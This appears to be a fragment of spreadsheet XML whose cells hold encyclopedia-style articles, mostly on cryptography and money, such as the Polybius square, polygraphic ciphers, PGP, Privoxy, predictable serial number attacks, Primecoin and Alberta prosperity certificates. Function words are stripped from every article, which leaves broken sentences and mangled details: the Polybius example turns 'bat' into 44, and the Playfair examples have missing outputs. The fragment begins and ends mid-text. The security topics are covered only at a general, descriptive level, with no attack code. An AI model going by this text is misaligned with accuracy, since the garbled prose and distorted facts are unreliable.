    <t>1936, alberta social credit party-led government province alberta, canada, introduced prosperity certificates attempt alleviate effects great depression. premier william aberhart's government power 1935 provincial election partly scheme. certificates issued general public aberhart promised election platform instead used relief workers provincial public works projects circulation special agreements municipalities.although technically money, certificate marked value dollar, redeemable canadian life certain dates course program. other certificates amount $239,000 worth scrip issued august 1936.a goal program encourage spending circulation spending power. achieve this, hoarding certificates discouraged requiring holder affix back certificate stamp every week certificate maintain validity. thus people encouraged spend whatever certificates week, avoid make many payments one-percent tax. program intended, possessors certificates tried avoid purchase affix stamps, spending certificates week's validity expired. this stamp scrip, innovated silvio gesell, part theories aberhart's mentor, social credit founder major douglas. hassle expense stamps made certificates unpopular public. make matters worse, tiny gummed postage-style stamps (smaller (0.16 in)) prone falling off. another issue finding seller would accept unusual currency. army navy stores, chain department stores, accepted currency merchants would not. oddly, currency accepted government payment taxes. notes intended redeemed years issue, stamps would affixed. program cancelled year. notes could returned government redeeming canadian currency.alberta's prosperity certificates never listed standard catalog world paper money. also demurrage (currency) local currency freigeld silvio gesell social credit prosperity bonus, also nicknamed ralph bucks 2006 $400 dividend every albertan references</t>
  </si>
  <si>
    <t>Polybius square</t>
  </si>
  <si>
    <t>polybius square, also known polybius checkerboard, device invented ancient greeks cleoxenus democleitus, made famous historian scholar polybius. device used fractionating plaintext characters represented smaller symbols, useful telegraphy, steganography, cryptography. device originally used fire signalling, allowing coded transmission message, finite amount predetermined options convention before. basic form according polybius' histories, device invented cleoxenus democleitus, developed polybius himself. device partitioned alphabet five tablets five letters (except last four). there surviving tablets antiquity. letters represented numbers five, allowing representation characters using numeric symbols. original square used greek alphabet laid follows: with modern latin alphabet, typical form: each letter represented coordinates grid. example, "bat" becomes 44". letters latin/english alphabet square, letters must combined (usually above, though alternative). alternatively, grid used allow numerals special characters included well letters. grid also usually used cyrillic alphabet (the common variant letters, japanese hiragana (see cryptography japan). could used reorder alphabet square, letters (without duplicates) placed beginning remaining letters following alphabetical order. example, phrase "polybius cipher" would lead reordered square below. applications telegraphy histories, polybius outlines need effective signalling warfare, leading development square. previously, fire-signalling useful expected, predetermined messages, convey novel messages unexpected events. according polybius, century bce, aeneas tacticus devised hydraulic semaphore system consisting matching vessels sectioned rods labelled different messages "heavy infantry", "ships", "corn". this system slightly better basic fire-signalling, still lacked ability convey needed message. polybius square used telegraphy, specifically fire-signalling. send message, sender would initially hold torches wait recipient signal ready receive message. sender would hold first torches left side indicate recipient tablet square) consulted. sender would raise torches right side indicate letter tablet intended message. both parties would need tablets, telescope tube narrow view, real magnification), torches.the polybius square also used form "knock code" signal messages cells prisons tapping numbers pipes walls. said used nihilist prisoners russian czars also prisoners vietnam war.arthur koestler describes code used political prisoners stalin 1930s anti-totalitarian novel darkness noon. (koestler prisoner-of-war spanish civil war.) indeed, signalled many simple ways (flashing lamps, blasts sound, drums, smoke signals) much easier learn sophisticated codes like morse code. however, also somewhat less efficient complex codes. steganography simple representation also lends steganography. figures five indicated knots string, stitches quilt, contiguous letters wider space many ways. cryptography polybius square also used basic cipher called polybius cipher. this cipher quite insecure modern standards, substitution cipher characters substituted pairs digits, easily broken frequency analysis. adaptations polybius square polybius cipher combined cryptographic methods adfgvx cipher, homophonic cipher more. hybrid polybius playfair cipher playfair cipher polyalphabetic substitution cipher invented charles wheatstone promoted lyon playfair based square accommodates alphabet manner similar polybius square. letters square arranged first inserting letters (without repetition), remaining letters (which appear subsequently normal alphabetical order). message divided pairs letters, filler letter inserted message length. letters pair same, filler inserted extra inserted message compensate this. each pair letters encrypted using playfair table "mapping rules".the mapping rules are: letters pair appear table, replace letters immediate right respectively letter plaintext pair rightmost letter row, wrap around left side row). letters pair appear column table, replace letters immediately respectively letter plaintext pair bottom column, wrap around column). letters pair column, replace letters letter column letter pair. order important: first letter encrypted pair sits first letter column second letter plaintext pair. plaintext message: hello world playfair message: playfair cipher: decryption rules encryption. cipher message mapped playfair matrix decryption, gives plaintext message back. hybrid polybius-playfair cipher, bigger table used, messages encrypted decrypted twice. plaintext encrypted using playfair cipher first, using polybius cipher. plaintext message: hello world playfair message: playfair cipher: polybius cipher: 3432 1452 2252 5243 3222 2455 also phryctoria straddling checkerboard code topics cryptography references external links online modular converter offering polybius square, bifid cipher code</t>
  </si>
  <si>
    <t>Polygraphic substitution</t>
  </si>
  <si>
    <t>polygraphic substitution cipher uniform substitution performed blocks letters. when length block specifically known, precise terms used: instance, cipher pairs letters substituted bigraphic. concept, polygraphic substitution contrasts monoalphabetic simple) substitutions individual letters uniformly substituted, polyalphabetic substitutions individual letters substituted different ways depending position text. theory, overlap definitions; could conceivably consider vigenère cipher eight-letter octographic substitution. practice, useful observation since fruitful consider polyalphabetic substitution cipher. specific ciphers 1563, giambattista della porta devised first biographic substitution. however, nothing matrix symbols. practice, would impossible memorize, carrying around table would lead risks falling enemy hands. 1854, charles wheatstone came playfair cipher, keyword-based system could performed paper field. this followed next fifty years closely related four-square two-square ciphers, slightly cumbersome offer slightly better security. 1929, lester hill developed hill cipher, uses matrix algebra encrypt blocks desired length. however, encryption difficult perform hand sufficiently large block size, although implemented machine computer. this therefore frontier classical modern cryptography. cryptanalysis general polygraphic substitutions polygraphic systems provide significant improvement security monoalphabetic substitutions. given individual letter message, could encrypted using instructions depending location neighbors, used great advantage mask frequency individual letters. however, security boost limited; generally requires larger sample text crack, still done hand. identify polygraphically-encrypted text performing frequency chart polygrams merely individual letters. these compared frequency plaintext english. distribution digrams even stark individual letters. example, common letters english (23%) represent approximately half english plaintext, takes frequent digrams achieve potency. addition, even plaintext many thousands characters long, would expect nearly half digrams would occur, barely. addition, looking text would expect fairly regular scattering repeated text multiples block length relatively multiples. cracking code identified polygraphic similar cracking general monoalphabetic substitution except larger 'alphabet'. identifies frequent polygrams, experiments replacing common plaintext polygrams, attempts build common words, phrases, finally meaning. naturally, investigation cryptanalyst suspect code specific type, like playfair order-2 hill cipher, could specific attack. also topics cryptography</t>
  </si>
  <si>
    <t>Portex</t>
  </si>
  <si>
    <t>portex bid/50/1) british cipher machine. rotor machine, device used eight rotors tyre ring insert. machine used mainly secret services late 1940s early 1950s. also bid/60 kl-7 references information card, bletchley park enigma friends exhibit, together david white john alexander, october 2005 [1]. external links jerry proc's page portex</t>
  </si>
  <si>
    <t>Privoxy</t>
  </si>
  <si>
    <t>privoxy free non-caching proxy filtering capabilities enhancing privacy, manipulating cookies modifying page data http headers page rendered browser. privoxy "privacy enhancing proxy", filtering pages removing advertisements. privoxy customized users, stand-alone systems multi-user networks. privoxy chained proxies frequently used combination squid among others used bypass internet censorship. history privoxy based internet junkbuster released general public license. runs linux, openwrt, dd-wrt, windows, macos, os/2, amigaos, beos, flavors unix. almost browser software hosted sourceforge. historically project bundled privoxy discontinued 2010 pushed internal browser project recommended external third party proxies. privoxy still works manually configured still recommended third party non-browser applications natively support socks. reception shashank sharma linux format rated 9/10 stars wrote, "privoxy highly customisable, easy good documentation work with. it!" erez zukerman world rated stars called complicated powerful. michelle delio wired.com called outstanding protect one's privacy". also content-control software accelerator discusses host-based http acceleration proxy server discusses client-side proxies reverse proxy discusses origin-side proxies internet cache protocol polipo, caching proxy server proxomitron, similar content-filtering proxy windows references external links official website privoxy sourceforge</t>
  </si>
  <si>
    <t>Predictable serial number attack</t>
  </si>
  <si>
    <t>predictable serial number attack form security exploit algorithm generating serial numbers particular purpose guessed, discovered, reverse engineered, serial number predicted using algorithm, newly generated serial number used fraudulent purpose, either obtain undeserved benefit deny service legitimate holder serial number. example suppose phone card available sale offers telephone service entering serial number printed card. alice legitimately purchases phone card order call bob, card serial number 0003. attacker, mallory, also purchases phone cards, notices serial numbers printed phone cards 0001 0002. after consuming value cards 0001 0002, mallory guesses algorithm used generating serial numbers simple sequence predicts 0003 valid serial number, enters 0003 prompted, gets additional phone service. when alice tries card discovers value stolen worthless. countermeasures common approach prevent predictable serial number attacks cryptographic hash function sha-2 generate actual serial numbers. internally, issuing organization creates (pseudo-)random nonce salt generating serial numbers, keeps secret. issuer increments internal serial number appends salt, computed message digest used create actual serial number. issuer take care prevent collisions existing values wrongly issue identical serial numbers. known attacks predictable serial numbers used part counterfeit certificate attack. ipod repairman guessed valid serial numbers used perpetrate fraud apple. also denial service hash collision basic access control security: dutch german passport numbers, functions part biometric passport decryption keys, made longer sequential increase difficulty wirelessly reading passport holder's information without permission. german tank problem historical problem references</t>
  </si>
  <si>
    <t>Prefix WhoIs</t>
  </si>
  <si>
    <t>prefix whois open source project develops operates free whois-compatible framework stockpiling querying various routing registry information. prefix whois uses global routing data learned many backbone routers. other information sources also supported, imported data every regional internet registry (afrinic, apnic, arin, lacnic ripe) geocoding information. project mentioned number popular network security network engineering books articles. public prefix whois service many public servers around world operate mirrors prefix whois, making information generally available worldwide. service used client using standard whois protocol. address whois.pwhois.org resolves prefix whois server nearest client based anycast dns. client software several client software packages available prefix whois commercial vendors. these include free, open source utilities whob layer four traceroute. server software pwhoisd server software responds standard whois queries supports variety output formats (including prefix whois native, cymru, rpsl). pwhois-updatedb agent parses routing information bases (ribs) internet routers digests route-views servers text format populates relational database software development libraries prefix whois project distributes libraries direct access prefix whois servers. http simplequery interface also available. software licensing software made available custom license. sources external links prefix whois project official site ripe whois alternative source similar information</t>
  </si>
  <si>
    <t>Pretext</t>
  </si>
  <si>
    <t>pretext (adj: pretextual) excuse something something accurate. pretexts based half-truth developed context misleading fabrication. pretexts used conceal true purpose rationale behind actions words. law, pretext usually describes false reasons hide true intentions motivations legal action. party establish prima facie case proffered evidence, opposing party must prove reasons "pretextual" false. this accomplished directly demonstrating motivations behind presentation evidence false, indirectly evidence motivations "credible". griffith schnitzer, employment discrimination case, jury award reversed court appeals evidence sufficient defendant's reasons "pretextual". that defendant's evidence either undisputed, plaintiff's "irrelevant subjective assessments opinions".a "pretextual" arrest enforcement officers carried illegal purposes conduct unjustified search seizure. example pretext, 1880s, chinese government raised money pretext modernizing chinese navy. instead, funds diverted repair ship-shaped, two-story pavilion originally constructed mother qianlong emperor. this pretext marble barge famously linked empress dowager cixi. this architectural folly, known today marble boat (shifang), "moored" lake kunming empress renamed "garden cultivating harmony" (yiheyuan).another example pretext demonstrated speeches roman orator cato elder (234–149 bc). cato, every public speech became pretext comment carthage. roman statesman come believe prosperity ancient carthage represented eventual inevitable danger rome. senate, cato famously ended every speech proclaiming opinion carthage destroyed (carthago delenda est). this oft-repeated phrase ultimate conclusion logical argument every oration, regardless subject speech. this pattern persisted death 149, year third punic began. words, subject became pretext reminding fellow senators dangers carthage represented. uses warfare early years japan's tokugawa shogunate unsettled, warring factions battling power. causes fighting part pretextural, outcome brought diminished armed conflicts siege osaka 1614–1615. 1614 (keichō 19): shogun vanquished hideyori fire osaka castle, returned winter edo. august 1614 (keichō 19th month): bronze bell hōkō-ji cast successfully [2]; despite dedication ceremony planning, ieyasu forbade actions concerning great bell:"[t]he tablet daibutsu-den bell bore inscription "kokka ankō" (meaning "the country house, peace tranquility"), tokugawa ieyasu affect take umbrage, alleging intended curse character (an, "peace") placed characters composing name ("ka-kō", "house tranquility") [suggesting subtly perhaps peace could attained ieyasu's dismemberment?] this incident inscription was, course, mere pretext, ieyasu realized could enjoy power usurped long hideyori lived, consequently, although latter hideyori dispatched vassal katagiri kastumoto ieyasu's residence (sunpu castle) profuse apologies, ieyasu refused placated."october 1614 (keichō 25th 10th month): strong earthquake shook kyoto. 1615 (keichō 20): osaka summer battle begins.the next two-and-a-half centuries japanese history comparatively peaceful successors tokugawa ieyasu bakufu government established. united states during 1812, president james madison often accused using impressment american sailors royal navy pretext invade canada. some argued united states president franklin roosevelt used attack pearl harbor japanese forces december 1941 pretext enter world american soldiers supplies assisting british soviet operations almost year point, united states thus "chosen side", political climate states time campaign promises made roosevelt would send american boys fight foreign wars. roosevelt could declare fear public backlash. attack pearl harbor united american people's resolve axis powers created bellicose atmosphere declare war. critics accused united states president george bush using september 11th, 2001 attacks faulty intelligence existence weapons mass destruction pretext iraq. social engineering type social engineering called pretexting uses pretext elicit information fraudulently target. pretext case includes research identity certain authorized person personality type order establish legitimacy mind target. also plausible deniability proximate cause causes franco-prussian notes references bamford, james. (2004). pretext war: 9/11, iraq, abuse america's intelligence agencies. york: doubleday books. isbn 978-0-385-50672-4; oclc 55068034 cato, marcus porcius. agriculture agricultura) trans, william davis hooper harrison boyd ash. cambridge: harvard university press. oclc 230499252 isikoff, michael david corn. 2006. hubris: inside story spin, scandal, selling iraq york: crown publishers. isbn 978-0-307-34681-0 min, anchee. (2007). last empress. york: houghton mifflin harcourt. isbn 978-0-618-53146-2 ponsonby-fane, richard arthur brabazon. (1956). kyoto, capital japan, kyoto: ponsonby memorial society. stinnett robert (2001). deceit: truth pearl harbor york: simon schuster. isbn 978-0-7432-0129-2 titsingh, isaac. (1834). [siyun-sai rin-siyo/hayashi gahō, 1652], nipon itsi ran; annales empereurs japon. paris: oriental translation fund great britain ireland.</t>
  </si>
  <si>
    <t>Pretty Good Privacy</t>
  </si>
  <si>
    <t>pretty good privacy (pgp) encryption program provides cryptographic privacy authentication data communication. used signing, encrypting, decrypting texts, e-mails, files, directories, whole disk partitions increase security e-mail communications. phil zimmermann developed 1991.pgp similar software follow openpgp, open standard encryption software, standard (rfc 4880) encrypting decrypting data. design encryption uses serial combination hashing, data compression, symmetric-key cryptography, finally public-key cryptography; step uses several supported algorithms. each public bound username e-mail address. first version system generally known trust contrast x.509 system, uses hierarchical approach based certificate authority added implementations later. current versions encryption include options automated management server. fingerprint public fingerprint shorter version public key. from fingerprint, someone validate correct corresponding public key. fingerprint like c3a6 5e46 7b54 77df 3c4c 9790 4d22 b3ca 5b32 ff66 printed business card. compatibility evolves, versions support newer features algorithms create encrypted messages older systems cannot decrypt, even valid private key. therefore, essential partners communication understand other's capabilities least agree settings. confidentiality used send messages confidentially. this, uses hybrid cryptosystem combining symmetric-key encryption public-key encryption. message encrypted using symmetric encryption algorithm, requires symmetric generated sender. symmetric used also called session key. message session sent receiver. session must sent receiver know decrypt message, protect transmission encrypted receiver's public key. only private belonging receiver decrypt session key, symmetrically decrypt message. digital signatures supports message authentication integrity checking. latter used detect whether message altered since completed (the message integrity property) former, determine whether actually sent person entity claimed sender digital signature). because content encrypted, changes message fail decryption appropriate key. sender uses create digital signature message either algorithms. computes hash (also called message digest) plaintext creates digital signature hash using sender's private key. trust both encrypting messages verifying signatures, critical public used send messages someone entity actually 'belong' intended recipient. simply downloading public somewhere reliable assurance association; deliberate accidental) impersonation possible. from first version, always included provisions distributing user's public keys 'identity certification', also constructed cryptographically tampering accidental garble) readily detectable. however, merely making certificate impossible modify without detected insufficient; prevent corruption certificate created, before. users must also ensure means public certificate actually belong person entity claiming given public specifically, information binding user name key) digitally signed third-party user attest association someone (actually user name) key. there several levels confidence included signatures. although many programs read write information, any) include level certification calculating whether trust key. trust protocol first described phil zimmermann 1992, manual version 2.0: time goes accumulate keys people want designate trusted introducers. everyone else choose trusted introducers. everyone gradually accumulate distribute collection certifying signatures people, expectation anyone receiving trust least signatures. this cause emergence decentralized fault-tolerant confidence public keys. trust mechanism advantages centrally managed public infrastructure scheme used s/mime universally used. users willing accept certificates check validity manually simply accept them. satisfactory solution found underlying problem. certificates (more recent) openpgp specification, trust signatures used support creation certificate authorities. trust signature indicates belongs claimed owner owner trustworthy sign keys level own. level signature comparable trust signature since validity certified. level signature similar trust certificate authority signed level able issue unlimited number level signatures. level signature highly analogous trust assumption users must rely whenever default certificate authority list (like included browsers); allows owner make keys certificate authorities. versions always included cancel ('revoke') public certificates. lost compromised private require communication security retained user. this less, equivalent certificate revocation lists centralised schemes. recent versions also supported certificate expiration dates. problem correctly identifying public belonging particular user unique pgp. public key/private cryptosystems problem, even slightly different guises, fully satisfactory solution known. pgp's original scheme least leaves decision whether endorsement/vetting system user, schemes not, requiring instead every certificate attested central certificate authority accepted correct. security quality best publicly available information, known method allow person group break encryption cryptographic, computational means. indeed, 1995, cryptographer bruce schneier characterized early version "the closest likely military-grade encryption." early versions found theoretical vulnerabilities current versions recommended. addition protecting data transit network, encryption also used protect data long-term data storage disk files. these long-term storage options also known data rest, i.e. data stored, transit. cryptographic security encryption depends assumption algorithms used unbreakable direct cryptanalysis current equipment techniques. original version, algorithm used encrypt session keys. rsa's security depends upon one-way function nature mathematical integer factoring. similarly, symmetric algorithm used version idea, might point future found previously undetected cryptanalytic flaws. specific instances current idea insecurities exist) publicly known. current versions added additional encryption algorithms, cryptographic vulnerability varies algorithm used. however, none algorithms current publicly known cryptanalytic weaknesses. versions released periodically vulnerabilities fixed developers come light. agency wanting read messages would probably easier means standard cryptanalysis, e.g. rubber-hose cryptanalysis black-bag cryptanalysis (e.g. installing form trojan horse keystroke logging software/hardware target computer capture encrypted keyrings passwords). already used attack investigations. however, vulnerabilities apply conventional encryption software. 2003, incident involving seized psion pdas belonging members brigade indicated neither italian police able decrypt pgp-encrypted files stored them.a second incident december 2006, (see boucher), involving customs agents seized laptop allegedly contained child pornography, indicates government agencies find "nearly impossible" access pgp-encrypted files. additionally, magistrate judge ruling case november 2007 stated forcing suspect reveal passphrase would violate fifth amendment rights i.e. suspect's constitutional right incriminate himself. fifth amendment issue opened government appealed case, federal district judge ordered defendant provide key.evidence suggests 2007, british police investigators unable break pgp, instead resorted using ripa legislation demand passwords/keys. november 2009 british citizen convicted ripa legislation jailed nine months refusing provide police investigators encryption keys pgp-encrypted files.pgp cryptosystem criticized complexity standard, implementation usability user interface including recognized figures cryptography research. uses ineffective serialization format storage keys encrypted data, resulted signature-spamming attacks public keys prominent developers privacy guard. backwards compatibility openpgp standard results usage relatively weak default choices cryptographic primitives (cast5 cipher, mode, password hashing). standard also criticized leaking metadata, usage long-term keys lack forward secrecy. popular end-user implementations suffered various signature-striping, cipher downgrade metadata leakage vulnerabilities attributed complexity standard. history early history phil zimmermann created first version encryption 1991. name, "pretty good privacy" inspired name grocery store, "ralph's pretty good grocery", featured radio host garrison keillor's fictional town, lake wobegon. this first version included symmetric-key algorithm zimmermann designed himself, named bassomatic saturday night live sketch. zimmermann long-time anti-nuclear activist, created encryption similarly inclined people might securely bbss securely store messages files. license required non-commercial use, complete source code included copies. posting june 2001, entitled "pgp marks 10th anniversary", zimmermann describes circumstances surrounding release pgp: 1991 sent first release couple friends uploading internet. first, sent allan hoeltje, posted peacenet, specialized grassroots political organizations, mainly peace movement. peacenet accessible political activists world. then, uploaded kelly goen, proceeded upload usenet newsgroup specialized distributing source code. request, marked usenet posting only". kelly also uploaded many systems around country. recall postings internet began june 6th. surprising back 1991, know enough usenet newsgroups realize only" merely advisory little real effect usenet propagated newsgroup postings. thought actually controlled usenet routed posting. back then, clue post anything newsgroup, even clear idea newsgroup was. found onto internet rapidly acquired considerable following around world. users supporters included dissidents totalitarian countries (some affecting letters zimmermann published, included testimony congress), civil libertarians parts world (see zimmermann's published testimony various hearings), 'free communications' activists called cypherpunks (who provided publicity distribution); decades later, cryptoparty activists much twitter. criminal investigation shortly release, encryption found outside united states, february 1993 zimmermann became formal target criminal investigation government "munitions export without license". time, cryptosystems using keys larger bits considered munitions within definition export regulations; never used keys smaller bits, qualified time. penalties violation, found guilty, substantial. after several years, investigation zimmermann closed without filing criminal charges anyone else. zimmermann challenged regulations imaginative way. published entire source code hardback book, press, distributed sold widely. anybody wishing build copy could covers, separate pages, scan using program conceivably enter type-in program software available), creating source code text files. could build application using freely available compiler collection. would thus available anywhere world. claimed principle simple: export munitions—guns, bombs, planes, software—was (and remains) restricted; export books protected first amendment. question never tested court respect pgp. cases addressing encryption software, however, federal appeals courts established rule cryptographic software source code speech protected first amendment (the ninth circuit court appeals bernstein case sixth circuit court appeals junger case). export regulations regarding cryptography remain force, liberalized substantially throughout late 1990s. since 2000, compliance regulations also much easier. encryption longer meets definition non-exportable weapon, exported internationally except seven specific countries list named groups individuals (with substantially trade prohibited various export controls). founding inc. during turmoil, zimmermann's team worked version encryption called this version considerable security improvements, including certificate structure fixed small security flaws certificates well permitting certificate include separate keys signing encryption. furthermore, experience patent export problems eschew patents entirely. introduced cast-128 (a.k.a. cast5) symmetric algorithm, elgamal asymmetric algorithms, unencumbered patents. after federal criminal investigation ended 1996, zimmermann team started company produce versions encryption. they merged viacrypt zimmermann sold commercial rights licensed directly rsadsi), changed name incorporated. newly combined viacrypt/pgp team started work versions encryption based system. unlike exclusively command line program, designed start software library allowing users work command line inside environment. original agreement viacrypt zimmermann team viacrypt would even-numbered versions zimmermann odd-numbered versions. viacrypt, thus, created version (based called remove confusion could successor renamed released 1997. network associates acquisition december 1997, inc. acquired network associates, inc. ("nai"). zimmermann team became employees. first company legal export strategy publishing source code. under nai, team added disk encryption, desktop firewalls, intrusion detection, ipsec vpns family. after export regulation liberalizations 2000 longer required publishing source, stopped releasing source code.in early 2001, zimmermann left nai. served chief cryptographer hush communications, provide openpgp-based e-mail service, hushmail. also worked veridis companies. october 2001, announced assets sale suspending development encryption. remaining asset kept e-business server (the original commandline version). february 2002, canceled support products, exception renamed commandline product. (formerly mcafee, intel security, mcafee again) continued sell support product name mcafee e-business server 2013. corporation symantec august 2002, several ex-pgp team members formed company, corporation, bought assets (except command line version) nai. company funded theis doll capital management (dcm) terry garnett venrock associates. corporation supported existing users honored nai's support contracts. zimmermann served special advisor consultant corporation continuing consulting company. 2003, corporation created server-based product called universal. mid-2004, corporation shipped command line version called command line, integrated encryption platform applications. 2005, corporation made first acquisition: german software company glück kanja technology became deutschland 2010, corporation acquired hamburg-based certificate authority trustcenter parent company, chosensecurity, form trustcenter division.after 2002 purchase nai's assets, corporation offered worldwide technical support offices draper, utah; offenbach, germany; tokyo, japan. april 2010, symantec corp. announced would acquire $300 million intent integrating enterprise security group. this acquisition finalized announced public june 2010. source code desktop available peer review.also 2010, intel corporation acquired mcafee. 2013, mcafee e-business server transferred software diversified services, sells, supports, develops name e-business server.for enterprise, townsend security currently offers commercial version mainframe platforms. townsend security partnered network associates 2000 create compatible version platform. townsend security ported 2008, time mainframe. this version relies free z/os encryption facility, utilizes hardware acceleration. software diversified services also offers commercial version (sds e-business server) mainframe. 2018, named efail discovered certain implementations 2003 could reveal plaintext contents emails encrypted chosen mitigation vulnerability desktop mandate seip protected packets ciphertext, lead emails encrypted objects longer decryptable upgrading software version mitigation. corporation encryption applications this section describes commercial programs available corporation. information programs compatible openpgp specification, external links below.while originally used primarily encrypting contents e-mail messages attachments desktop client, products diversified since 2002 encryption applications managed optional central policy server. encryption applications include e-mails attachments, digital signatures, full disk encryption, file folder security, protection sessions, batch file transfer encryption, protection files folders stored network servers and, recently, encrypted signed http request/responses means client-side (enigform) server-side (mod openpgp) module. there also wordpress plugin available, called wp-enigform-authentication, takes advantage session management features enigform mod_openpgp. desktop family includes desktop email, whole disk encryption, netshare. additionally, number desktop bundles also available. depending application, products feature desktop e-mail, digital signatures, security, whole disk encryption, file, folder security, encrypted self-extracting archives, secure shredding deleted files. capabilities licensed different ways depending features required. universal server management console handles centralized deployment, security policy, policy enforcement, management, reporting. used automated e-mail encryption gateway manages desktop clients. addition local keyserver, universal server works public keyserver—called global directory—to find recipient keys. capability delivering e-mail securely recipient found secure https browser session. with desktop managed universal server 2.x, first released 2005, encryption applications based proxy-based architecture. these newer versions software eliminate e-mail plug-ins insulate user changes desktop applications. desktop server operations based security policies operate automated fashion. universal server automates creation, management, expiration keys, sharing keys among encryption applications. symantec platform undergone rename. desktop known symantec encryption desktop (sed), universal server known symantec encryption management server (sems). current shipping versions symantec encryption desktop 10.3.0 (windows macos platforms) symantec encryption server 3.3.2. also available command-line, enables command line-based encryption signing information storage, transfer, backup, well support package blackberry enables blackberry devices enjoy sender-to-recipient messaging encryption. versions applications openpgp s/mime, allowing communications user nist specified standard. openpgp within inc., still concern surrounding patent issues. rsadsi challenging continuation viacrypt license newly merged firm. company adopted informal internal standard called "unencumbered pgp" would "use algorithm licensing difficulties". because encryption's importance worldwide, many wanted write software would interoperate zimmermann became convinced open standard encryption critical cryptographic community whole. july 1997, inc. proposed ietf standard called openpgp. they gave ietf permission name openpgp describe standard well program supported standard. ietf accepted proposal started openpgp working group. openpgp internet standards track active development. many e-mail clients provide openpgp-compliant email security described 3156. current specification 4880 (november 2007), successor 2440. 4880 specifies suite required algorithms consisting elgamal encryption, dsa, triple sha-1. addition algorithms, standard recommends described pkcs v1.5 encryption signing, well aes-128, cast-128 idea. beyond these, many algorithms supported. standard extended support camellia cipher 5581 2009, signing exchange based elliptic curve cryptography (ecc) (i.e. ecdsa ecdh) 6637 2012. support encryption added proposed 4880bis 2014. free software foundation developed openpgp-compliant software suite called privacy guard, freely available together source code general public license maintained separately several graphical user interfaces interact gnupg library encryption, decryption, signing functions (see kgpg, seahorse, macgpg). several vendors also developed openpgp-compliant software. development open source openpgp-compliant library, openpgp.js, written javascript supported horizon 2020 framework programme european union, allowed web-based applications encryption browser. 1991 message exchange formats (obsolete) openpgp 2440 openpgp message format (obsolete) 4880 openpgp message format 5581 camellia cipher openpgp 6637 elliptic curve cryptography (ecc) openpgp draft-ietf-openpgp-crypto-refresh openpgp message format pgp/mime 2015 mime security pretty good privacy (pgp) 3156 mime security openpgpopenpgp's encryption ensure secure delivery files messages, well provide verification created sent message using process called digital signing. open source office suite libreoffice implemented document signing openpgp version 5.4.0 linux. using openpgp communication requires participation sender recipient. openpgp also used secure sensitive files stored vulnerable places like mobile devices cloud. limitations with advancement cryptography, parts criticized dated: long length public keys difficulty users comprehend poor usability lack ubiquity lack forward secrecyin october 2017, roca vulnerability announced, affects keys generated buggy infineon firmware used yubikey tokens, often used pgp. many published keys found susceptible. yubico offers free replacement affected tokens. popular culture referenced 1998 film anarchy 1:07:18 movie 3.5" floppy disk portrayed encrypted pgp. also references further reading garfinkel, simson (1995). pgp: pretty good privacy. o'reilly associates. isbn 1-56592-098-8. levy, steven (january 2001). crypto: code rebels beat government—saving privacy digital age. penguin books. isbn 0140244328. lucas, michael (april 2006). email practical paranoid. starch press. isbn 978-1-59327-071-1. zimmermann, phil (june 1991). "why wrote pgp". retrieved march 2008. external links openpgp::sdk public directory registration search list public keyservers ietf openpgp working group openpgp alliance</t>
  </si>
  <si>
    <t>Primecoin</t>
  </si>
  <si>
    <t>primecoin (sign: code: xpm) cryptocurrency implements proof-of-work system searches chains prime numbers. history primecoin launched july 2013 anonymous hacker peer coin founder sunny king.earlier cryptocurrencies, bitcoin, mined using algorithms solved arbitrary mathematical problems, results value outside mining cryptocurrency itself. primecoin's algorithm, however, computed chains prime numbers (cunningham bi-twin chains), results published block chain's public ledger, available scientists, mathematicians, anyone else. proof-of-work system calculate chains prime numbers innovation produced useful results also meeting criteria proof-of-work system: involved calculation difficult perform easy verify, difficulty adjustable.shortly launch, trade journals reported rush 18,000 users seeking mine primecoin overwhelmed providers dedicated servers.primecoin targets block generation period minute rather every minutes, changes difficulty every block rather every 2016 blocks, dynamic block reward function difficulty. prime coin transactions confirmed approximately 8–10 times fast bitcoin transactions. references further reading orrell, david; chlupatý, roman (2016). evolution money. york: columbia university press. 200–201. isbn 978-0-231-17372-8. retrieved november 2018. antonopoulos, andreas (2014). mastering bitcoin: unlocking digital cryptocurrencies. sebastopol, california: o'reilly media. isbn 978-1-4919-2198-2. retrieved november 2018. fanning, kurt; centers, david june 2016). "blockchain coming impact financial services". journal corporate accounting finance. (5): 54–55. doi:10.1002/jcaf.22179. external links official website</t>
  </si>
  <si>
    <t>Private currency in pre-revolutionary Russia</t>
  </si>
  <si>
    <t>russia, second half 19th early 20th century limited means payment rather widespread among private individuals owners commercial firms, shop owners, owners profitable outlets clubs. sometimes surrogate money resulted temporary shortage state paper bills small denominations small coins region country. often initiators unofficial emissions desire concrete economic benefit, example, bons paid instead usual wage went purchase goods trade points organized entrepreneurs. sorts public organizations clubs class, national, professional, regimental-officer, charitable, hunting-sports others functioned actively, buffets canteens, organized kind activity. places listed, surrogate local money release used, usually collectively referred "tokens." often, owners establishments gave surrogate money employees salary. gaming chips gaming clubs, tokens served conditional bargaining unit used individual citizens private houses playing cards lotto counting units "betting bank." playing chips produced famous (back then) firms, layer" (russian: л.хр.лаyеръ), produced 1889 sets chips size different metals different denominations kopeck rubles. tavern chips used hotels, restaurants similar institutions late 19th early 20th century, so-called "tavern chips" played primarily role accounting means: waiters made preliminary internal calculation cashiers receive money customers. using counting "chips" restaurants described detail shishkin: these stamps used restaurant type institutions waiters. they intended internal settlements waiters, buffet, kitchen. this done start work waiter received tokens different denominations cash desk certain amount. took either bought his/her money (this practiced restaurants). passing order visitor buffet kitchen, waiter brought stamps required amount, visitor received money. shift, waiter handed cashier remaining chips money received visitors (except tips). institutions waiter buying tokens his/her cash, cashier returned money rest chips. from buffet kitchen, chips returned cashier next given waiter. tavern chips used various consumer organizations, clubs, private hotels, restaurants, taverns gambling houses, manufacturers producing chips demand private companies well.the famous pre-revolutionary moscow restaurateurs represented chips short inscriptions "yar" (russian: яръ), "slavic bazaar" (russian: славянскiй базаръ), "prague s.t." (russian: прага т.). deposit chips special "deposit" metal bons used designation denominations, also names items came temporary use, deposit, guests. application additional inscriptions, specifying type service provided, invention owners moscow's metropol.on chips restaurant "metropol" series named "deposit" additionally added room hotel "6". separate group consists coin-shaped tokens, often without specification denomination, name items used guests metropol hotel, served time local restaurant. church money among numerous types russian metal tokens copies name church monastery value kopecks. chips names churches represented kind church "trifle". they given change buying candles accessories. subsequent purchases items church, chips adopted intra-church surrogates small money. churches, paper bons purpose also known. chips names monasteries somewhat different purpose. monasteries served place pilgrimage believers, attracted various shrines, stored monasteries. sometimes number pilgrims quite significant, special influx pilgrims celebration saint whose relics monastery. reception temporary accommodation arriving monasteries hotels dining rooms. meals refectory served chips used internal calculations serving refectory staff (usually among monks), kitchen buffet, restaurants tavern tokens used waiters. bakery tokens tokens often issued owners 